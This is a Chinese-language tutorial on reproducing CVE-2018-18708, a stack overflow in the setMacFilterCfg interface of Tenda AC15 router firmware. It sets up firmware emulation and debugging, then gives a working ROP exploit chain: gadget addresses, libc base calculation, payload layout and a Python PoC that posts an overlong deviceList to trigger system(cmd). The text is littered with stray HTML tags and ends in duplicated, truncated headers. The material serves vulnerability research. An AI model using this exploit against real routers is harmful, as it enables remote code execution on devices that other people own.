CVE-2018-18708漏洞复现与挖掘技术详解<\/h1>

1. 漏洞概述<\/h2>
CVE-2018-18708是Tenda路由器中的一个栈溢出漏洞，存在于`setMacFilterCfg<\/code>接口的deviceList<\/code>参数处理过程中。攻击者可以通过构造特殊的HTTP请求触发该漏洞，最终可能导致远程代码执行。<\/p>`

2. 环境准备<\/h2>
2.1 工具安装<\/h3>
# 基础工具<\/span>
<\/span><\/span>apt-get install bridge-utils uml-utilities qemu-user-static
<\/span><\/span>
<\/span><\/span># 调试工具<\/span>
<\/span><\/span>git clone https:\/\/github.com\/hugsy\/gdb-static  # 获取gdbserver<\/span>
<\/span><\/span><\/code><\/pre>2.2 固件获取与解压<\/h3>
固件和PoC可从GitHub获取：<\/p>
https:\/\/github.com\/Snowleopard-bin\/pwn\/tree\/master\/IOT\/Tenda_CVE-2018-16333
<\/code><\/pre>
使用binwalk解压固件：<\/p>
binwalk -Me US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin
<\/span><\/span><\/code><\/pre>2.3 文件系统准备<\/h3>
进入解压后的核心文件夹：<\/p>
cd _US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin.extracted\/squashfs-root
<\/span><\/span><\/code><\/pre>3. 调试环境搭建<\/h2>
3.1 QEMU用户级调试<\/h3>

复制qemu-arm-static到文件系统：<\/li>
<\/ol>
cp $(<\/span>which qemu-arm-static)<\/span> .
<\/span><\/span><\/code><\/pre>
网络配置：<\/li>
<\/ol>
.\/net.sh
<\/span><\/span><\/code><\/pre>
手动创建必要目录：<\/li>
<\/ol>
mkdir -p \/var\/run \/var\/lock
<\/span><\/span><\/code><\/pre>3.2 QEMU系统级调试<\/h3>

打包文件系统：<\/li>
<\/ol>
mksquashfs squashfs-root rootfs.img -comp xz -all-root
<\/span><\/span><\/code><\/pre>
启动QEMU：<\/li>
<\/ol>
.\/boot.sh
<\/span><\/span><\/code><\/pre>
配置网络：<\/li>
<\/ol>
ifconfig eth0 192.168.1.100 netmask 255.255.255.0
<\/span><\/span><\/code><\/pre>4. 漏洞分析<\/h2>
4.1 漏洞定位<\/h3>

关键函数调用链：<\/li>
<\/ol>
formSetMacFilterCfg -> sub_C14DC -> sub_C17A0 -> sub_C24C0
<\/code><\/pre>

漏洞触发点：<\/li>
<\/ol>
strcpy(src_1 +<\/span> 32<\/span>, s);  \/\/ 栈溢出点
<\/span><\/span><\/span><\/code><\/pre>4.2 漏洞条件<\/h3>

参数中必须包含\r<\/code>字符(ASCII 13)<\/li>
macFilterType<\/code>必须为"black"或"white"<\/li>
deviceList<\/code>参数长度超过176字节<\/li>
<\/ul>
5. 漏洞利用<\/h2>
5.1 偏移量计算<\/h3>
通过调试确认：<\/p>

缓冲区大小为176字节(0xB0)<\/li>
PC寄存器偏移量为176<\/li>
<\/ul>
5.2 ROP链构造<\/h3>
5.2.1 关键Gadget<\/h4>

控制R3和PC：<\/li>
<\/ol>
0x00018298 : pop {r3, pc}
<\/code><\/pre>

控制R0：<\/li>
<\/ol>
0x00040cb8 : mov r0, sp ; blx r3
<\/code><\/pre>
5.2.2 libc基址计算<\/h4>

获取运行时puts地址：0x3fdd1cd4<\/code><\/li>
IDA中puts偏移量：0x35CD4<\/code><\/li>
libc基址计算：<\/li>
<\/ol>
libc_base = runtime_puts - ida_puts_offset
          = 0x3fdd1cd4 - 0x35cd4 
          = 0x3fd9c000
<\/code><\/pre>
5.2.3 system地址计算<\/h4>

获取system在libc中的偏移量<\/li>
计算运行时地址：<\/li>
<\/ol>
system_addr = libc_base + system_offset
<\/code><\/pre>
5.3 Payload结构<\/h3>
最终payload格式：<\/p>
[offset, gadget1, system_addr, gadget2, cmd]
<\/code><\/pre>
执行流程：<\/p>

覆盖返回地址为gadget1地址<\/li>
gadget1弹出system_addr到r3<\/li>
gadget2将栈顶地址(cmd)赋给r0<\/li>
执行system(cmd)<\/li>
<\/ol>
6. 漏洞复现步骤<\/h2>
6.1 准备工作<\/h3>

修补httpd程序：<\/li>
<\/ol>
rasm2 "mov r3, #1"<\/span>  # 生成机器码<\/span>
<\/span><\/span># 使用IDA Patch Program功能修改二进制<\/span>
<\/span><\/span><\/code><\/pre>
启动httpd服务：<\/li>
<\/ol>
chroot . .\/qemu-arm-static .\/bin\/httpd
<\/span><\/span><\/code><\/pre>6.2 调试设置<\/h3>

启动gdbserver：<\/li>
<\/ol>
.\/gdbserver :1234 .\/bin\/httpd
<\/span><\/span><\/code><\/pre>
宿主机连接：<\/li>
<\/ol>
gdb-multiarch -ex "target remote :1234"<\/span>
<\/span><\/span><\/code><\/pre>6.3 触发漏洞<\/h3>
发送构造的HTTP请求：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/target_ip\/goform\/setMacFilterCfg"<\/span>
<\/span><\/span>data =<\/span> {
<\/span><\/span>    "macFilterType"<\/span>: "black"<\/span>,
<\/span><\/span>    "deviceList"<\/span>: "<\/span>\r<\/span>"<\/span> +<\/span> "A"<\/span>*<\/span>176<\/span> +<\/span> payload
<\/span><\/span>}
<\/span><\/span>requests.<\/span>post(url, data=<\/span>data)
<\/span><\/span><\/code><\/pre>7. 注意事项<\/h2>


ARM架构的CPSR寄存器T位处理：<\/p>

Thumb模式地址需要+1<\/li>
检查system函数是否处于Thumb模式<\/li>
<\/ul>
<\/li>

网络配置问题：<\/p>

确保br0网卡已创建<\/li>
QEMU系统级调试需要手动配置网络<\/li>
<\/ul>
<\/li>

调试技巧：<\/p>

在strcpy函数处设置断点<\/li>
使用pwndbg进行更方便的调试<\/li>
<\/ul>
<\/li>
<\/ol>
8. 参考资源<\/h2>


漏洞分析文章：<\/p>

https:\/\/blog.xmcve.com\/2022\/10\/08\/CVE-2018-18708-漏洞复现\/<\/li>
https:\/\/blog.csdn.net\/m0_55368674\/article\/details\/128939608<\/li>
<\/ul>
<\/li>

工具链接：<\/p>

https:\/\/github.com\/hugsy\/gdb-static<\/li>
https:\/\/github.com\/Snowleopard-bin\/pwn\/tree\/master\/IOT\/Tenda_CVE-2018-16333<\/li>
<\/ul>
<\/li>
<\/ol>

CVE-2018-18708漏洞复现与挖掘技术详解<\/h1>

1. 漏洞概述<\/h2> CVE-2018-18708是Tenda路由器中的一个栈溢出漏洞，存在于setMacFilterCfg<\/code>接口的deviceList<\/code>参数处理过程中。攻击者可以通过构造特殊的HTTP请求触发该漏洞，最终可能导致远程代码执行。<\/p>

3. 调试环境搭建<\/h2>

4. 漏洞分析<\/h2>

5. 漏洞利用<\/h2>

5.2 ROP链构造<\/h3>

6. 漏洞复现步骤<\/h2>

1. 漏洞概述<\/h2>
CVE-2018-18708是Tenda路由器中的一个栈溢出漏洞，存在于`setMacFilterCfg<\/code>接口的deviceList<\/code>参数处理过程中。攻击者可以通过构造特殊的HTTP请求触发该漏洞，最终可能导致远程代码执行。<\/p>`